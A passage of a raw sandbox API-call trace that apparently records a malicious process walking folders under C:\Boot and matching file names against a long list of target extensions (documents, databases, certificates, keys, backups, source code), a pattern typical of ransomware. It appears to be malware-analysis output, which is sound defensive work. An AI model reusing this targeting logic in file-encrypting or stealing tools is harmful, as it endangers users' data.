-1 [0285.833] lstrlenW (lpString=".json") returned 5 [0285.834] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.834] lstrlenW (lpString=".jsp") returned 4 [0285.834] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".kdc") returned 4 [0285.834] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".kmz") returned 4 [0285.834] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".kwm") returned 4 [0285.834] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".lasso") returned 6 [0285.834] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.834] lstrlenW (lpString=".lbi") returned 4 [0285.834] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".lgf") returned 4 [0285.834] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".lgp") returned 4 [0285.834] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".log") returned 4 [0285.834] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.834] lstrlenW (lpString=".m1v") returned 4 [0285.973] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.973] lstrlenW (lpString=".m4a") returned 4 [0285.973] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.978] lstrlenW (lpString=".m4v") returned 4 [0285.978] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.978] lstrlenW (lpString=".max") returned 4 [0285.978] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.978] lstrlenW (lpString=".md") returned 3 [0285.983] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.983] lstrlenW (lpString=".mda") returned 4 [0285.983] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.983] lstrlenW (lpString=".mdb") returned 4 [0285.988] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.988] lstrlenW (lpString=".mde") returned 4 [0285.988] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.992] lstrlenW (lpString=".mdf") returned 4 [0285.992] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.992] lstrlenW (lpString=".mdw") returned 4 [0285.995] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.996] lstrlenW (lpString=".mef") returned 4 [0285.996] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.998] lstrlenW (lpString=".mft") returned 4 [0285.998] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mfw") returned 4 [0286.002] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mht") returned 4 [0286.002] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mhtml") returned 6 [0286.002] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.002] lstrlenW (lpString=".mka") returned 4 [0286.002] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mkidx") returned 6 [0286.002] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.002] lstrlenW (lpString=".mkv") returned 4 [0286.002] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mos") returned 4 [0286.002] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mov") returned 4 [0286.002] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mp3") returned 4 [0286.002] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mp4") returned 4 [0286.002] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.002] lstrlenW (lpString=".mpeg") returned 5 [0286.003] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.003] lstrlenW (lpString=".mpg") returned 4 [0286.003] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.003] lstrlenW (lpString=".mpv") returned 4 [0286.003] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.003] lstrlenW (lpString=".mrw") returned 4 [0286.003] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.003] lstrlenW (lpString=".msg") returned 4 [0286.003] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.003] lstrlenW (lpString=".mxl") returned 4 [0286.003] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".myd") returned 4 [0286.003] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".myi") returned 4 [0286.003] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".nef") returned 4 [0286.003] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".nrw") returned 4 [0286.003] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".obj") returned 4 [0286.003] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".odb") returned 4 [0286.003] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".odc") returned 4 [0286.003] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.003] lstrlenW (lpString=".odm") returned 4 [0286.004] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".odp") returned 4 [0286.004] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".ods") returned 4 [0286.004] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".oft") returned 4 [0286.004] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".one") returned 4 [0286.004] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".onepkg") returned 7 [0286.004] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.004] lstrlenW (lpString=".onetoc2") returned 8 [0286.004] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.004] lstrlenW (lpString=".opt") returned 4 [0286.004] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".oqy") returned 4 [0286.004] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".orf") returned 4 [0286.004] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.004] lstrlenW (lpString=".p12") returned 4 [0286.004] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".p7b") returned 4 [0286.005] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".p7c") returned 4 [0286.005] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pam") returned 4 [0286.005] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pbm") returned 4 [0286.005] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pct") returned 4 [0286.005] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pcx") returned 4 [0286.005] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pdd") returned 4 [0286.005] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pdf") returned 4 [0286.005] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pdp") returned 4 [0286.005] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pef") returned 4 [0286.005] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pem") returned 4 [0286.005] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pff") returned 4 [0286.005] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.005] lstrlenW (lpString=".pfm") returned 4 [0286.006] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.006] lstrlenW (lpString=".pfx") returned 4 [0286.006] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.006] lstrlenW (lpString=".pgm") returned 4 [0286.006] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.006] lstrlenW (lpString=".php") returned 4 [0286.006] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.006] lstrlenW (lpString=".php3") returned 5 [0286.006] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.006] lstrlenW (lpString=".php4") returned 5 [0286.006] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.006] lstrlenW (lpString=".php5") returned 5 [0286.006] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.006] lstrlenW (lpString=".phtml") returned 6 [0286.006] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.006] lstrlenW (lpString=".pict") returned 5 [0286.006] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.006] lstrlenW (lpString=".pl") returned 3 [0286.006] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.006] lstrlenW (lpString=".pls") returned 4 [0286.006] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.006] lstrlenW (lpString=".pm") returned 3 [0286.006] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.006] lstrlenW (lpString=".png") returned 4 [0286.006] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".pnm") returned 4 [0286.007] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".pot") returned 4 [0286.007] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".potm") returned 5 [0286.007] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.007] lstrlenW (lpString=".potx") returned 5 [0286.007] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.007] lstrlenW (lpString=".ppa") returned 4 [0286.007] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".ppam") returned 5 [0286.007] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.007] lstrlenW (lpString=".ppm") returned 4 [0286.007] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".pps") returned 4 [0286.007] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".ppsm") returned 5 [0286.007] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.007] lstrlenW (lpString=".ppt") returned 4 [0286.007] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.007] lstrlenW (lpString=".pptm") returned 5 [0286.007] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.007] lstrlenW (lpString=".pptx") returned 5 [0286.007] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.007] lstrlenW (lpString=".prn") returned 4 [0286.007] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".ps") returned 3 [0286.008] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.008] lstrlenW (lpString=".psb") returned 4 [0286.008] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".psd") returned 4 [0286.008] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".pst") returned 4 [0286.008] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".ptx") returned 4 [0286.008] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".pub") returned 4 [0286.008] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".pwm") returned 4 [0286.008] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".pxr") returned 4 [0286.008] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".py") returned 3 [0286.008] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.008] lstrlenW (lpString=".qt") returned 3 [0286.008] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.008] lstrlenW (lpString=".r3d") returned 4 [0286.008] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".raf") returned 4 [0286.008] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.008] lstrlenW (lpString=".rar") returned 4 [0286.008] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.008] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.009] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.009] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.009] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.009] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0286.009] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.009] lstrlenW (lpString="C:\\Boot\\hr-HR") returned 13 [0286.009] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.009] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.009] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.010] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.010] lstrlenW (lpString=".1cd") returned 4 [0286.010] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".3ds") returned 4 [0286.010] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".3fr") returned 4 [0286.010] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".3g2") returned 4 [0286.010] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".3gp") returned 4 [0286.010] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".7z") returned 3 [0286.010] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.010] lstrlenW (lpString=".accda") returned 6 [0286.010] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.010] lstrlenW (lpString=".accdb") returned 6 [0286.010] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.010] lstrlenW (lpString=".accdc") returned 6 [0286.010] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.010] lstrlenW (lpString=".accde") returned 6 [0286.010] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.010] lstrlenW (lpString=".accdt") returned 6 [0286.010] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.010] lstrlenW (lpString=".accdw") returned 6 [0286.010] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.010] lstrlenW (lpString=".adb") returned 4 [0286.010] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".adp") returned 4 [0286.010] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.010] lstrlenW (lpString=".ai") returned 3 [0286.011] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.011] lstrlenW (lpString=".ai3") returned 4 [0286.011] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".ai4") returned 4 [0286.011] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".ai5") returned 4 [0286.011] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".ai6") returned 4 [0286.011] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".ai7") returned 4 [0286.011] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".ai8") returned 4 [0286.011] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".anim") returned 5 [0286.011] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.011] lstrlenW (lpString=".arw") returned 4 [0286.011] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".as") returned 3 [0286.011] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.011] lstrlenW (lpString=".asa") returned 4 [0286.011] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".asc") returned 4 [0286.011] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.011] lstrlenW (lpString=".ascx") returned 5 [0286.011] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.012] lstrlenW (lpString=".asm") returned 4 [0286.012] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".asmx") returned 5 [0286.012] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.012] lstrlenW (lpString=".asp") returned 4 [0286.012] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".aspx") returned 5 [0286.012] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.012] lstrlenW (lpString=".asr") returned 4 [0286.012] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".asx") returned 4 [0286.012] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".avi") returned 4 [0286.012] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".avs") returned 4 [0286.012] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".backup") returned 7 [0286.012] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.012] lstrlenW (lpString=".bak") returned 4 [0286.012] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".bay") returned 4 [0286.012] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.012] lstrlenW (lpString=".bd") returned 3 [0286.012] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.012] lstrlenW (lpString=".bin") returned 4 [0286.013] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".bmp") returned 4 [0286.013] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".bz2") returned 4 [0286.013] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".c") returned 2 [0286.013] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.013] lstrlenW (lpString=".cdr") returned 4 [0286.013] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".cer") returned 4 [0286.013] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".cf") returned 3 [0286.013] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.013] lstrlenW (lpString=".cfc") returned 4 [0286.013] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".cfm") returned 4 [0286.013] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".cfml") returned 5 [0286.013] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.013] lstrlenW (lpString=".cfu") returned 4 [0286.013] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".chm") returned 4 [0286.013] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".cin") returned 4 [0286.013] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".class") returned 6 [0286.013] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.013] lstrlenW (lpString=".clx") returned 4 [0286.013] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.013] lstrlenW (lpString=".config") returned 7 [0286.014] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.014] lstrlenW (lpString=".cpp") returned 4 [0286.014] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".cr2") returned 4 [0286.014] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".crt") returned 4 [0286.014] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".crw") returned 4 [0286.014] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".cs") returned 3 [0286.014] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.014] lstrlenW (lpString=".css") returned 4 [0286.014] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".csv") returned 4 [0286.014] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".cub") returned 4 [0286.014] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".dae") returned 4 [0286.014] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".dat") returned 4 [0286.014] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".db") returned 3 [0286.014] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.014] lstrlenW (lpString=".dbf") returned 4 [0286.014] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".dbx") returned 4 [0286.014] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".dc3") returned 4 [0286.014] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".dcm") returned 4 [0286.014] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.014] lstrlenW (lpString=".dcr") returned 4 [0286.014] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".der") returned 4 [0286.015] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".dib") returned 4 [0286.015] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".dic") returned 4 [0286.015] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".dif") returned 4 [0286.015] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".divx") returned 5 [0286.015] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.015] lstrlenW (lpString=".djvu") returned 5 [0286.015] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.015] lstrlenW (lpString=".dng") returned 4 [0286.015] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".doc") returned 4 [0286.015] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".docm") returned 5 [0286.015] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.015] lstrlenW (lpString=".docx") returned 5 [0286.015] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.015] lstrlenW (lpString=".dot") returned 4 [0286.015] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.015] lstrlenW (lpString=".dotm") returned 5 [0286.015] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.015] lstrlenW (lpString=".dotx") returned 5 [0286.015] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.015] lstrlenW (lpString=".dpx") returned 4 [0286.015] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".dqy") returned 4 [0286.016] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".dsn") returned 4 [0286.016] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".dt") returned 3 [0286.016] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.016] lstrlenW (lpString=".dtd") returned 4 [0286.016] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".dwg") returned 4 [0286.016] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.016] lstrlenW (lpString=".dwt") returned 